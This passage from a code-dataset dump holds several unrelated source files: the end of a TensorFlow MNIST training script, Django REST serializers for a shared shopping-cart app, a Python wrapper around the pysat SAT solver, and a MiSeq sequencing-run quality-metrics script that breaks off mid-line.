tf.merge_summary([loss_summary, acc_summary])\n\n # Add the variable initializer Op.\n init = tf.initialize_all_variables()\n\n # Create a saver for writing training checkpoints.\n saver = tf.train.Saver()\n\n # Create a summary writer.\n print(\"Writing Summaries to %s\" % FLAGS.model_dir)\n train_summary_writer = tf.train.SummaryWriter(FLAGS.model_dir)\n\n # Uncomment the following line to see what we have constructed.\n # tf.train.write_graph(tf.get_default_graph().as_graph_def(),\n # \"/tmp\", \"complete.pbtxt\", as_text=True)\n\n # Run training for MAX_STEPS and save checkpoint at the end.\n with tf.Session(graph=mnist_graph) as sess:\n # Run the Op to initialize the variables.\n sess.run(init)\n\n # Start the training loop.\n for step in xrange(FLAGS.num_steps):\n # Read a batch of images and labels.\n images_feed, labels_feed = data_sets.train.next_batch(BATCH_SIZE)\n\n # Run one step of the model. The return values are the activations\n # from the `train_op` (which is discarded) and the `loss` Op. To\n # inspect the values of your Ops or variables, you may include them\n # in the list passed to sess.run() and the value tensors will be\n # returned in the tuple from the call.\n _, loss_value, tsummary, acc = sess.run(\n [train_op, loss, train_summary_op, accuracy],\n feed_dict={images_placeholder: images_feed,\n labels_placeholder: labels_feed})\n if step % 100 == 0:\n # Write summary info\n train_summary_writer.add_summary(tsummary, step)\n if step % 1000 == 0:\n # Print loss/accuracy info\n print('----Step %d: loss = %.4f' % (step, loss_value))\n print(\"accuracy: %s\" % acc)\n\n print(\"\\nWriting checkpoint file.\")\n checkpoint_file = os.path.join(FLAGS.model_dir, 'checkpoint')\n saver.save(sess, checkpoint_file, global_step=step)\n _, loss_value = sess.run(\n [train_op, loss],\n feed_dict={images_placeholder: data_sets.test.images,\n labels_placeholder: data_sets.test.labels})\n print(\"Test set loss: %s\" % loss_value)\n\n # Run evaluation based on the saved checkpoint.\n with tf.Session(graph=tf.Graph()) as sess:\n checkpoint_file = tf.train.latest_checkpoint(FLAGS.model_dir)\n print(\"\\nRunning evaluation based on saved checkpoint.\")\n print(\"checkpoint file: {}\".format(checkpoint_file))\n # Load the saved meta graph and restore variables\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(sess, checkpoint_file)\n\n # Retrieve the Ops we 'remembered'.\n logits = tf.get_collection(\"logits\")[0]\n images_placeholder = tf.get_collection(\"images\")[0]\n labels_placeholder = tf.get_collection(\"labels\")[0]\n\n # Add an Op that chooses the top k predictions.\n eval_op = tf.nn.top_k(logits)\n\n # Run evaluation.\n images_feed, labels_feed = data_sets.validation.next_batch(\n EVAL_BATCH_SIZE)\n prediction = sess.run(eval_op,\n feed_dict={images_placeholder: images_feed,\n labels_placeholder: labels_feed})\n for i in range(len(labels_feed)):\n print(\"Ground truth: %d\\nPrediction: %d\" %\n (labels_feed[i], prediction.indices[i][0]))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_dir', type=str, default='MNIST_data',\n help='Directory for storing data')\n parser.add_argument('--num_steps', type=int,\n default=25000,\n help='Number of training steps to run')\n parser.add_argument('--model_dir', type=str,\n default=os.path.join(\n \"/tmp/tfmodels/mnist_layers\",\n str(int(time.time()))),\n help='Directory for storing model info')\n FLAGS = parser.parse_args()\n tf.app.run()\n","sub_path":"workshop_sections/mnist_series/mnist_layers.py","file_name":"mnist_layers.py","file_ext":"py","file_size_in_byte":10662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300264219","text":"from django.utils.translation import ugettext_lazy as _\nfrom rest_framework import serializers\n\nfrom mamicart.cart.models import Cart, CartItem\nfrom mamicart.users.models import User\n\n\nclass CartSerializer(serializers.ModelSerializer):\n class Meta:\n model = Cart\n fields = (\n 'pk',\n 'title',\n 'owner',\n 'members',\n 'created_at',\n 'updated_at',\n 'created_by',\n )\n read_only_fields = (\n 'pk',\n 'created_at',\n 'updated_at',\n 'created_by',\n )\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n # Set owner and created_by fields automatically on create\n validated_data.update({\n 'owner': user,\n 'created_by': user,\n })\n\n # Owner should be automatically added to a list of members\n members = validated_data.pop('members', [])\n members.append(user)\n validated_data['members'] = members\n\n return super().create(validated_data)\n\n def validate_owner(self, value):\n user = self.context['request'].user\n\n if self.instance:\n if value != self.instance.owner and user != self.instance.owner:\n raise serializers.ValidationError(_(\"Only owner can change ownership of a cart\"))\n\n return value\n\n\nclass CartItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = CartItem\n fields = (\n 'pk',\n 'title',\n 'is_completed',\n 'cart',\n 'assignee',\n 'created_at',\n 'updated_at',\n 'created_by',\n )\n read_only_fields = (\n 'pk',\n 'created_at',\n 'updated_at',\n 'created_by',\n )\n\n def create(self, validated_data):\n user = self.context['request'].user\n\n validated_data.update({\n # Can't set assignee on create\n 'assignee': None,\n # Set created_by field automatically on create\n 'created_by': user,\n })\n\n return super().create(validated_data)\n\n def validate_assignee(self, value):\n user = self.context['request'].user\n\n # Cart item can have no assignee\n if value is None:\n return value\n\n if self.instance and self.instance.cart:\n if user != self.instance.cart.owner:\n raise serializers.ValidationError(_(\"Only owner of a cart can assign cart items\"))\n\n if not self.instance.cart.members.filter(pk=value.pk).exists():\n raise serializers.ValidationError(_(\"Cart item can only be assigned to a cart member\"))\n\n return value\n\n def validate_cart(self, value):\n user = self.context['request'].user\n\n if self.instance: # Update\n if value != self.instance.cart:\n if user != self.instance.cart.owner:\n raise serializers.ValidationError(\n _(\"Only owner of a current cart can move item into another new cart\")\n )\n\n if user != value.owner:\n raise serializers.ValidationError(\n _(\"Only owner of a cart can add or move items into his cart\")\n )\n\n return value\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = (\n 'pk',\n 'username',\n 'first_name',\n 'last_name',\n )\n read_only_fields = (\n 'pk',\n )\n","sub_path":"mamicart/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"422479165","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n##\n## solver.py\n##\n## Created on: Sep 24, 2019\n## Author: Jonatan D. Westholm \n## E-mail: jonatanwestholm@gmail.com\n##\n\n\"\"\"\n ===============\n Module Details\n ===============\n\n\"\"\"\n\n\nfrom pysat.solvers import Solver\nfrom pysat.card import CardEnc, EncType, ITotalizer\nfrom pysat.formula import CNF\n\nfrom sugarrush.utils import flatten_simple as flatten\nfrom sugarrush.utils import dbg, a_eq_i, is_iter\n\n\nclass SugarRush(Solver):\n \"\"\"\n Quality-of-life wrapper for pysat.solvers.Solver\n\n * Does automatic bookkeeping of literals.\n * When calling constraint builders, new literals are assigned,\n that do not interfere with existing literals. \n * New literals can also be created and accessed by :meth:`var`.\n * After solving, the solution value for a given var, \n can be obtained by :meth:`solution_value`.\n * Constraint builders return CNF's, \n but do not add them automatically to the model.\n\n\n \"\"\"\n def __init__(self, name=\"glucose4\"):\n super().__init__(name=name)\n self.var2val = {}\n self.lits = set([0])\n\n def var(self):\n \"\"\"\n **Added in SugarRush**\\n\n Return a new unused variable. \n \"\"\"\n self.lits.add(self._top_id() + 1)\n return self._top_id()\n\n def add(self, c):\n \"\"\"\n **Added in SugarRush**\\n\n If c is iterable of iterable of ints, then interpret as CNF.\n If c is iterable of ints (simple list of literals), \n then interpet as single clause.\\n\n Simple list of literals:\n\n .. code-block:: python\n\n >>> from sugarrush.solver import SugarRush\n >>> with SugarRush() as solver:\n X = [solver.var() for _ in range(6)]\n solver.add(X)\n solver.solve()\n print(solver.solution_values(X))\n [1, 0, 0, 0, 0, 0]\n\n List of list of literals:\n\n .. code-block:: python\n\n >>> from sugarrush.solver import SugarRush\n >>> with SugarRush() as solver:\n X = [solver.var() for _ in range(6)]\n solver.add([X])\n solver.solve()\n print(solver.solution_values(X))\n [1, 0, 0, 0, 0, 0]\n\n Normal CNF:\n\n .. code-block:: python\n\n >>> from sugarrush.solver import SugarRush\n >>> with SugarRush() as solver:\n X = [solver.var() for _ in range(6)]\n solver.add([X[:3], X[3:]])\n solver.solve()\n print(solver.solution_values(X))\n [1, 0, 0, 1, 0, 0]\n\n \"\"\"\n for elem in c:\n try:\n iter(elem)\n except TypeError:\n self._add(c) # c is list of ints\n break\n self._add(*c) # c is list of lists of ints\n break\n\n def _add(self, *clauses):\n for clause in clauses:\n self._add_clause(clause)\n\n def _add_clause(self, clause):\n self._add_lits(clause)\n self.add_clause(clause)\n\n def _add_lits(self, lits):\n \"\"\"\n **Added in SugarRush**\\n\n Update the internal set of literals.\n \"\"\"\n for lit in lits:\n self.lits.add(abs(lit))\n\n def _add_lits_from(self, cnf):\n \"\"\"\n **Added in SugarRush**\\n\n Update the internal set of literals from a CNF.\n \"\"\"\n self._add_lits(flatten(cnf))\n\n def _top_id(self):\n \"\"\"\n **Added in SugarRush**\\n\n Return the largest valued literal in use by the model.\n \"\"\"\n return max(self.lits)\n\n def _init_var2val(self):\n \"\"\"\n **Added in SugarRush**\\n\n Initialize a mapping to the solved values. The mapping \n is such that **var2val[var]** has the same boolean value as \n :param:`var` in the satisfying assignment.\n \"\"\"\n for val in self.get_model():\n if abs(val) in self.lits:\n self.var2val[abs(val)] = (val > 0) * 1 # 1-indexed\n\n def solve(self, **kwargs):\n ret = super().solve(**kwargs)\n self.solver_called = True\n return ret\n\n def solution_value(self, var):\n \"\"\"\n **Added in SugarRush**\\n\n Get solved value of **var**. Must not be run before successful solve.\n \"\"\"\n try:\n _ = self.solver_called\n except AttributeError:\n raise TypeError(\"Solver.solution_value() called before model solved\")\n \n if (not self.var2val) or self.solver_called:\n self._init_var2val()\n self.solver_called = False\n \n if var not in self.var2val:\n return 0\n else:\n return self.var2val[var]\n\n def solution_values(self, variables):\n \"\"\"\n **Added in SugarRush**\\n\n List version of :meth:`solution_value`.\n \"\"\"\n return [self.solution_value(var) for var in variables]\n\n def print_stats(self):\n \"\"\"\n **Added in SugarRush**\\n\n Print number of variables and number of clauses used by the solver.\n \"\"\"\n print(\"Nof variables:\", self.nof_vars())\n print(\"Nof clauses:\", self.nof_clauses())\n\n def print_values(self):\n \"\"\"\n **Added in SugarRush**\\n\n Print full mapping from vars to boolean values\n \"\"\"\n for var, val in sorted(self.var2val.items()):\n print(\"{}: {}\".format(var, val))\n\n \"\"\"\n Constructs\n \"\"\"\n def equals(self, lits, bound=1, encoding=EncType.seqcounter):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`pysat.card.CardEnc.equals`.\n Adds automatic bookkeeping of literals.\n \"\"\"\n cnf = CardEnc.equals(lits=lits,\n bound=bound,\n encoding=encoding,\n top_id=self._top_id())\n clauses = cnf.clauses\n self._add_lits_from(clauses)\n return clauses\n\n def atmost(self, lits, bound=1, encoding=EncType.seqcounter):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`pysat.card.CardEnc.atmost`.\n Adds automatic bookkeeping of literals.\n \"\"\"\n cnf = CardEnc.atmost(lits=lits,\n bound=bound,\n encoding=encoding,\n top_id=self._top_id())\n clauses = cnf.clauses\n self._add_lits_from(clauses)\n return clauses\n #self.add(clauses)\n #return cnf.clauses\n\n def negate(self, clauses):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`pysat.formula.CNF.negate`.\n Adds automatic bookkeeping of literals.\n \"\"\"\n cnf = CNF(from_clauses=clauses)\n neg = cnf.negate(topv=self._top_id())\n neg_clauses = neg.clauses\n self._add_lits_from(neg_clauses)\n #neg_force = [[-auxvar] for auxvar in neg.auxvars]\n #print(neg_force)\n #self.add(neg_force)\n #print(neg.auxvars)\n #self.add([neg.auxvars])\n return neg_clauses\n\n def int2binvec(solver, x, N):\n \"\"\"\n **Added in SugarRush**\\n\n Given an integer, return an N-length binary vector \n and clauses equal to that integer.\n \"\"\"\n if is_iter(x):\n return x, []\n else:\n i = x\n x = [solver.var() for _ in range(N)]\n return x, a_eq_i(x, i)\n\n def xor(self, x1, x2):\n \"\"\"\n **Added in SugarRush**\\n\n Returns an indicator t <=> xor(x1, x2),\n and clauses.\n Adds automatic bookkeeping of literals.\n \"\"\"\n\n t = self.var()\n clauses = [[-t, x1, x2], [-t, -x1, -x2], [t, x1, -x2], [t, -x1, x2]]\n return t, clauses\n\n def parity(self, X):\n \"\"\"\n **Added in SugarRush**\\n\n Returns an indicator t, for whether the \n sum of X is even (t=0) or odd (t=1).\n Adds automatic bookkeeping of literals.\n \"\"\"\n\n if len(X) == 0:\n raise ValueError(\"Cannot take parity of zero variables\")\n\n clauses = []\n t = X[0]\n\n for x in X[1:]:\n t, c = self.xor(x, t)\n clauses.extend(c)\n\n return t, clauses\n\n def less(self, a, b):\n return self.less_(a, b, strict=True)\n\n def leq(self, a, b):\n return self.less_(a, b, strict=False)\n\n def less_(self, a, b, strict):\n \"\"\"\n **Added in SugarRush**\\n\n Return indicator and constraints for a less than b.\n if strict: a < b\n if not strict: a <= b\n Adds automatic bookkeeping of literals.\n \"\"\"\n\n if is_iter(a):\n N = len(a)\n else:\n N = len(b) # b better be iterable then\n\n a, cnfa = self.int2binvec(a, N)\n b, cnfb = self.int2binvec(b, N)\n print(cnfa, cnfb)\n cnf = cnfa + cnfb\n\n assert len(a) == len(b)\n last_iteration = len(a) - 1\n\n ti_1 = None # t(i - 1)\n for iteration, (ai, bi) in enumerate(zip(a, b)):\n # The t's indicate that given the current assumptions\n # about the literals, the constraint is already fulilled.\n # If ti becomes true anywhere,\n # then this will propagate to all subsequent clauses,\n # and pop them.\n if ti_1 is None:\n already_smaller = [[-ai], [bi]]\n else:\n already_smaller = [[ti_1, -ai], [ti_1, bi]]\n ti, ti_bind = self.indicator(already_smaller)\n cnf.extend(ti_bind)\n if iteration is last_iteration and strict:\n pass\n elif iteration is last_iteration and not strict:\n ti, ti_bind = self.indicator([[ti, -ai, bi]])\n cnf.extend(ti_bind)\n else:\n cnf.append([ti, -ai, bi]) # ti OR (ai <= bi) == (ti OR !ai OR bi)\n ti_1 = ti\n return ti, cnf\n\n def plus(self, a, b, z):\n \"\"\"\n **Added in SugarRush**\\n\n Constrains \n z = (a + b) % 2**N\n N == len(a) == len(b) == len(z)\n for the inputs that are binary vectors, \n integer inputs are converted to binary vectors.\n\n In other words, uintN addition.\n The leftmost bit is assumed to be the highest bit.\n \"\"\"\n\n if is_iter(a):\n N = len(a)\n elif is_iter(b):\n N = len(b)\n else:\n N = len(z)\n\n a, cnfa = self.int2binvec(a, N)\n b, cnfb = self.int2binvec(b, N)\n z, cnfz = self.int2binvec(z, N)\n assert len(a) == len(b) == len(z)\n cnf = cnfa + cnfb + cnfz\n\n return cnf + self.plus_(a, b, z)\n\n def plus_(self, a, b, z):\n \"\"\"\n **Added in SugarRush**\\n\n Internal method\n Constrains \n z = (a + b) % 2**N\n N == len(a) == len(b) == len(z)\n\n In other words, uintN addition.\n The leftmost bit is assumed to be the highest bit.\n \"\"\"\n\n cnf = []\n carry = None\n for ap, bp, zp in zip(a[::-1], b[::-1], z[::-1]):\n if carry is None:\n t, t_bind = self.parity([ap, bp])\n carry = self.var()\n cnf.extend([[-carry, ap], [-carry, bp], [carry, -ap, -bp]]) # carry == ap AND bp\n else:\n t, t_bind = self.parity([ap, bp, carry])\n carry_1 = self.var()\n cnf.extend([[carry_1, -ap, -bp], [carry_1, -ap, -carry], [carry_1, -bp, -carry], \n [-carry_1, ap, bp], [-carry_1, ap, carry], [-carry_1, bp, carry]]) \n # carry_1 == (ap + bp + carry >= 2)\n carry = carry_1\n cnf.extend(t_bind)\n cnf.extend([[zp, -t], [-zp, t]]) # zp == t\n return cnf\n\n def element(self, v, a, z):\n cnf = []\n try:\n K = len(a)\n except TypeError:\n # the given a is an integer\n i = a\n assert i < len(v), \"list index out of range\"\n K = 0\n while 2**K < len(v):\n K += 1\n a = [self.var() for _ in range(K)]\n cnf.extend(a_eq_i(a, i))\n\n return cnf + self.element_(v, a, z)\n\n def element_(self, v, a, z):\n \"\"\"Constrain\n \n z = v[a]\n\n where a is uintK,\n z is uintN,\n v is a vector of at most 2**K uintN\n \"\"\"\n\n assert len(v) <= 2**len(a)\n assert all([len(vi) == len(z) for vi in v])\n\n cnf = []\n for i, vi in enumerate(v):\n a_eq_i_clauses = a_eq_i(a, i)\n ti, ti_bind = self.indicator(a_eq_i_clauses)\n cnf.extend(ti_bind)\n for vij, zj in zip(vi, z):\n # if ti is true then vij == zj\n cnf.extend([[-ti, -vij, zj], [-ti, vij, -zj]])\n return cnf\n\n def indicator(self, cnf):\n \"\"\"\n **Added in SugarRush**\\n\n Uses Tseytin transformation to create a variable that has the \n same boolean value as the given CNF.\n Does automatic bookkeeping of literals.\n Creates len(cnf) + 1 new variables\n\n Return indicator variable, and the equivalence clauses\n \"\"\"\n indicators = []\n clauses = []\n for clause in cnf:\n p, equivalence = self.indicate_disjunction(clause)\n indicators.append(p)\n clauses.extend(equivalence)\n\n p, equivalence = self.indicate_conjunction(indicators)\n clauses.extend(equivalence)\n return p, clauses\n\n def indicate_disjunction(self, clause):\n \"\"\"\n **Added in SugarRush**\\n\n p <=> (c1 OR c2 OR ... OR cn)\n \"\"\"\n if len(clause) == 1:\n return clause[0], []\n p = self.var()\n right_imp = [clause + [-p]] # p => (c1 OR c2 OR ... OR cn)\n left_imp = [[-c, p] for c in clause] # (c1 OR c2 OR ... OR cn) => p\n equivalence = right_imp + left_imp\n return p, equivalence\n\n def indicate_conjunction(self, clause):\n \"\"\"\n **Added in SugarRush**\\n\n p <=> (c1 AND c2 AND ... AND cn)\n \"\"\"\n p = self.var()\n right_imp = [[-p, c] for c in clause] # p => (c1 AND c2 AND ... AND cn)\n left_imp = [[-c for c in clause] + [p]] # (c1 AND c2 AND ... AND cn) => p\n equivalence = right_imp + left_imp\n return p, equivalence\n\n def disjunction(self, cnfs):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`indicator` to create a CNF that has the same boolean value\n as the disjunction of a given set of CNF's. \n Does automatic bookkeeping of literals.\n \"\"\"\n inds = []\n clauses = []\n for cnf in cnfs:\n p, equiv = self.indicator(cnf)\n inds.append(p)\n clauses.extend(equiv)\n clauses.append(inds)\n return clauses\n\n def itotalizer(self, lits, ubound=None):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`pysat.card.ITotalizer`.\n Adds automatic bookkeeping of literals.\n \"\"\"\n if ubound is None:\n ubound = len(lits)\n itot = ITotalizer(lits, ubound)\n clauses = itot.cnf.clauses\n bound_vars = itot.rhs\n self._add_lits_from(clauses)\n return clauses, bound_vars\n\n def optimize(self, itot, search=\"linear\"):\n if search == \"linear\":\n return self.optimize_linear(itot)\n elif search == \"binary\":\n return self.optimize_binary(itot)\n else:\n raise Exception(\"Unknown search method!\")\n\n def optimize_linear(self, itot):\n self.print_stats()\n ub = len(itot) - 1\n if not self.solve(assumptions=[-itot[ub]]):\n return None\n ub -= 1\n while ub >= 0:\n print(\"ub:\", ub)\n if not self.solve(assumptions=[-itot[ub]]):\n print(\"returning:\", ub + 1)\n return ub + 1\n else:\n ub -= 1\n return 0\n\n def optimize_binary(self, itot, debug=False):\n \"\"\"\n **Added in SugarRush**\\n\n Uses binary search to find the smallest satisfiable value for the ITotalizer.\n Assumes that satisfiability is monotonically increasing.\n \"\"\"\n upper = len(itot) - 1 # smallest known to be feasible\n lower = 0 # largest known to be infeasible (after initial check)\n if not self.solve(assumptions=[-itot[upper]]):\n return None\n if self.solve(assumptions=[-itot[lower]]):\n return 0\n while True:\n mid = (upper + lower) // 2\n dbg(\"upper: %d\" % upper, debug)\n dbg(\"mid: %d\" % mid, debug)\n dbg(\"lower: %d\" % lower, debug)\n if mid == lower:\n break\n satisfiable = self.solve(assumptions=[-itot[mid]])\n dbg(\"satisfiable: %d\" % satisfiable, debug)\n if satisfiable:\n upper = mid\n else:\n lower = mid\n dbg(\"\", debug)\n self.solve(assumptions=[-itot[upper]])\n return upper","sub_path":"sugarrush/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":17670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"387731108","text":"# coding=utf-8\n\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nfrom decimal import *\nimport os\nimport subprocess\nfrom subprocess import Popen, PIPE\nimport re\nimport logging\nimport argparse\nimport sys\nimport stat\nimport shutil\nfrom interop import py_interop_run_metrics, py_interop_run, py_interop_summary\nimport pandas as pd\nimport yaml\n\"\"\"\nEric Fournier\n2019-07-12\n\nProgramme permettant de calculer les metrics d'une run MiSeq\n\n\n\"\"\"\n\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\n################################## Global Var #################################\n\n#Parsing de la ligne de commande\nparser = argparse.ArgumentParser(description=\"Calculateur des statistique de runs MiSeq\")\nparser.add_argument(\"-r\",\"--runno\",help=\"Nom de la run dans S/Partage/LSPQ_MiSeq\",required=True)\nparser.add_argument(\"-p\",\"--param\",help=\"path vers le fichier de parametre\",required=True)\nparser.add_argument(\"-s\",\"--subdir\",help=\"Nom du sous repertoire de la cassette\",required=True)\n\nargs_commandline = parser.parse_args(sys.argv[1:])\nargs = args_commandline.__dict__\nproject_name = args[\"runno\"]\npath_param_file = args[\"param\"]\ncartridge_subdir = args[\"subdir\"]\n\nproject_year = project_name[0:4]\n\n#print \"CARTRIDGE IS \", cartridge_subdir\n\n\n#exit(0)\n\nsnakemake_param_handle = open(path_param_file)\nall_dict = yaml.load(snakemake_param_handle)\nsnakemake_param_handle.close()\n\nlspq_miseq_experimental_dir = all_dict[\"lspq_miseq_subdir\"][0]\nlspq_miseq_miseqruntrace_dir = all_dict[\"lspq_miseq_subdir\"][1]\nlspq_miseq_sequencebrute_dir = all_dict[\"lspq_miseq_subdir\"][2]\nlspq_miseq_analyse_dir = all_dict[\"lspq_miseq_subdir\"][3]\n\n\n#Repertoire local temporaire pour les calculs\ntemp_dir = \"/data/temp/TEMP_FASTQ\"\nrScript = \"/data/Applications/GitScript/MiSeqRunQuality/ComputeReadsStat2.R\"\n\nif not os.path.isdir(temp_dir):\n os.system(\"mkdir {0}\".format(temp_dir))\nelse:\n os.system(\"rm -rf {0}\".format(temp_dir))\n os.system(\"mkdir {0}\".format(temp_dir))\n\n\n#Repertoire de la run\nbasedir = os.path.join(all_dict[\"path\"][0],project_year,project_name)\nslbio_basedir = os.path.join(all_dict[\"path\"][1],project_name)\n\n#Quelques check-up\nif not os.path.isdir(basedir):\n logging.error(basedir + \" est inexistant\")\n exit(0)\n\nif not os.path.isdir(slbio_basedir):\n logging.error(slbio_basedir + \" est inexistant\")\n exit(0)\n\n#Repertoire contenant les fastq\n#fastq_dir = os.path.join(basedir,lspq_miseq_sequencebrute_dir)\nfastq_dir = os.path.join(slbio_basedir,cartridge_subdir)\nif not os.path.isdir(fastq_dir):\n logging.error(fastq_dir + \" est inexistant\")\n exit(0)\n\ninterop_dir = os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir,\"InterOp\")\nif not os.path.join(basedir,interop_dir):\n logging.error(interop_dir + \" est inexistant\")\n exit(0)\n\n#On s assure qu il y a des fastq\nif not os.listdir(fastq_dir):\n logging.error(\"Aucun fastq dans \" + fastq_dir)\n exit(0)\n\n#Le fichier RunInfo.xml\nruninfo_file = os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir,\"RunInfo.xml\")\n#print \"run info \", runinfo_file\nif not os.path.isfile(runinfo_file):\n logging.error(\"Le fichier {0} est absent\".format(runinfo_file))\n exit(0)\n\n#Le fichier runParameters.xml\nrunparam_file = os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir,\"runParameters.xml\")\nif not os.path.isfile(runinfo_file):\n logging.error(\"Le fichier {0} est absent\".format(runparam_file))\n exit(0)\n\n#Fichier de resultats final\noutfile = open(os.path.join(temp_dir,\"MiSeqStat_\" + project_name + \"TEMP.txt\"),'w')\noutfile_append = open(os.path.join(temp_dir,\"MiSeqStat_\" + project_name + \".txt\"),'a+')\n\n#Metric de chacun des specimens\nallfile_qc_dict = {}\n\n#Key = nom du specimen Value = [nombre total de nucleaotid, genome coverage]\nallspec_cov_dict = {}\n\n\n################################## End Global Var #################################\n\n################################## Begin Function #################################\n\ndef ComputeGenomeCoverage(specname,nBnucleotid):\n \"\"\"\n Calcul de la couverture du genome pour ce specimen\n :param specname:\n :param nBnucleotid:\n \"\"\"\n nBnucleotid_r1_r2 = float(nBnucleotid) + float(allspec_cov_dict[specname][0])\n\n cov = round(nBnucleotid_r1_r2 / genome_length, 0)\n\n allspec_cov_dict[specname].append(cov)\n\n\n################################## End Function #################################\n\n\n################################## Begin Program #################################\nlogging.info(\" Start Calculation\")\n\nlogging.info(\" Calcul des metrics de la run\")\n\n#Recuperation du Q30 pour la run\nrun_metrics = py_interop_run_metrics.run_metrics()\nrun_folder = run_metrics.read(os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir))\nsummary = py_interop_summary.run_summary()\npy_interop_summary.summarize_run_metrics(run_metrics, summary)\nsummary.total_summary().yield_g()\n\ncolumns = (('% Over Q30', 'percent_gt_q30'),)\nrows = [('Total', summary.total_summary()),]\n\nd = []\nfor label, func in columns:\n d.append((pd.Series([getattr(r[1], func)() for r in rows], index=[r[0] for r in rows])))\n\nparse_d = re.search(r'Total\\s{4}(\\S+)',str(d[0]))\npercent_gt_q30 = round(float(parse_d.group(1)),0)\n\n#Recuperation des valeurs de cluster pour la run\ndef format_value(val):\n if hasattr(val, 'mean'):\n return val.mean()\n else:\n return val\n\nread = 0\ncolumns = (('Density (K/mm2)', 'density'),('% Cluster PF','percent_pf'))\nrows = [summary.at(read).at(lane) for lane in xrange(summary.lane_count())]\nd2 = []\nfor label, func in columns:\n d2.append( (pd.Series([format_value(getattr(r, func)()) for r in rows])))\n\ndensity = str(d2[0])\npercent_pf = str(d2[1])\n\nparse_density = re.search(r'\\S+\\s{4}(\\S+)',density)\ndensity = parse_density.group(1)\ndensity = round(float(density) / 1000,0)\n\nparse_percent_pf = re.search(r'\\S+\\s{4}(\\S+)',percent_pf)\npercent_pf = parse_percent_pf.group(1)\npercent_pf = round(float(percent_pf),0)\n\n#Calculs des Q30 pour les samples avec R\nlogging.info(\" Calcul des metrics des samples dans R\")\n\n\nos.system(\"Rscript {0} {1} {2} \".format(rScript,fastq_dir,temp_dir))\n\n#modif_20200121\nmin_q30_spec_dict = {}\n\n#Contruction du dictionnaire de metrics\ntry:\n # Fichier de resultat metrics genere par le rScript\n metric_file_from_R = open(os.path.join(temp_dir,\"fastqStat.txt\"))\n\n for line in metric_file_from_R:\n\n #print \"line is \", line\n\n line_parse = re.search(r'(\\S+)\\t(\\S+)\\t(\\S+)\\t(\\S+)',line)\n fastq_file = line_parse.group(1)\n\n if(fastq_file.find(\"RUN\") != -1):\n spec_name = \"RUN\"\n else:\n spec_name = fastq_file[:-3]\n\n min_q30_perc = line_parse.group(2)\n\n # modif_20200121\n spec = fastq_file.split('_')[0]\n try:\n min_q30_spec_dict[spec].append(min_q30_perc)\n except:\n min_q30_spec_dict[spec] = []\n min_q30_spec_dict[spec].append(min_q30_perc)\n\n\n nb_read = line_parse.group(3)\n nb_nucleotid = line_parse.group(4)\n allfile_qc_dict[fastq_file] = [min_q30_perc,nb_read]\n\n if spec_name in allspec_cov_dict.keys():\n pass\n #OBSOLETE\n #ComputeGenomeCoverage(spec_name,nb_nucleotid)\n elif spec_name.find(\"RUN\") == -1:\n allspec_cov_dict[spec_name] = [nb_nucleotid]\n\n metric_file_from_R.close()\n\nexcept:\n logging.error(\"Probleme de lecture du fichier fastqStat.txt\")\n exit(0)\n\n#Transfert des metrics dans le fichier de resultats final\nlogging.info(\" Lecture des metrics\")\n\n#modif_20200121\noutfile.write(\"ID\\tNb_Reads\\tCluster_Density_K_mm2\\tCluster_Passing_Filter\\tOver_Q30\\tR1_R2_Mean_Q30\\n\")\n\nfor fastqfile in allfile_qc_dict.keys():\n if(fastqfile != \"RUN\"):\n #print fastqfile\n\n #modif_20200121\n spec = fastqfile.split('_')[0]\n mean_Q30 = \"---\"\n if re.search(r'_R1', fastqfile):\n mean_Q30 = (int(min_q30_spec_dict[spec][0]) + int(min_q30_spec_dict[spec][1])) / 2\n\n min_q30_perc = allfile_qc_dict[fastqfile][0]\n nb_read = allfile_qc_dict[fastqfile][1]\n\n # modif_20200121\n if mean_Q30 == \"---\":\n outfile.write(\"{0}{1}{2}{1}{3}{1}{4}{1}{5}{1}{6}\\n\".format(fastqfile, \"\\t\", nb_read, 'NA', 'NA', min_q30_perc, \"\"))\n else:\n outfile.write(\"{0}{1}{2}{1}{3}{1}{4}{1}{5}{1}{6}\\n\".format(fastqfile, \"\\t\", nb_read, 'NA', 'NA', min_q30_perc,\"<\" + str(mean_Q30) + \">\"))\n else:\n min_q30_perc = allfile_qc_dict[fastqfile][0]\n nb_read = allfile_qc_dict[fastqfile][1]\n outfile.write(\"{0}{1}{2}{1}{3}{1}{4}{1}{5}\\n\".format(fastqfile, \"\\t\", nb_read, density, percent_pf, percent_gt_q30))\n\noutfile.close()\n\nsortfile = os.path.join(temp_dir,\"MiSeqStat_\" + project_name + \".txt\")\nos.system(\"awk 'NR<2{print $0;next}{print $0 | \\\"sort -k1\\\" }' \" + outfile.name + \"> \" + sortfile)\n\n#On ajoute les valeurs de couverture OBSOLETE\n#outfile_append.write(\"\\nID\\tCoverage\\n\")\n#for my_spec_name in allspec_cov_dict.keys():\n# outfile_append.write(\"{0}\\t{1}\\n\".format(my_spec_name,allspec_cov_dict[my_spec_name][1]))\n#outfile_append.close()\n\n\nos.system(\"sudo cp {0} 